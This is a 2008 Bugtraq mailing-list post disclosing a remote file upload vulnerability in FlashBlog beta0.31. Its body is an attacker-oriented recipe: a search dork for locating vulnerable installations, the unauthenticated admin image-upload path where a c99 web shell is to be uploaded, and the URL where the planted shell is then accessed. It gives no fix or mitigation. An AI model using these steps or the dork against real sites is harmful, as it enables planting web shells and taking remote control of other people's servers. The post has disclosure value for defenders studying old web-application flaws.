FlashBlog Remote File Upload Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: FlashBlog Remote File Upload Vulnerability
From: mefisto@xxxxxxxxxxxxxx
Date: 29 May 2008 06:57:21 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

FlashBlog beta0.31 Remote File Upload Vulnerability 

# Author  : MEFISTO  ----  mefisto |at |hackermail |dot| com


# Dork    : flashblog.html

# Website : www.dumenci.net

http://[Site]/[script]/admin/Editor/imgupload.php ==>>> upload your c99 shell

http://[Site]/[script]/tus_imagenes/c99.php ==>>> your address

Tnx: Dumenci, Damar, Cr@zy_king

Prev by Date: Secunia Research: imlib2 PNM and XPM Buffer Overflow
Next by Date: [ GLSA 200805-23 ] Samba: Heap-based buffer overflow
Previous by thread: Secunia Research: imlib2 PNM and XPM Buffer Overflow
Next by thread: [ GLSA 200805-23 ] Samba: Heap-based buffer overflow
Index(es):
- Date
- Thread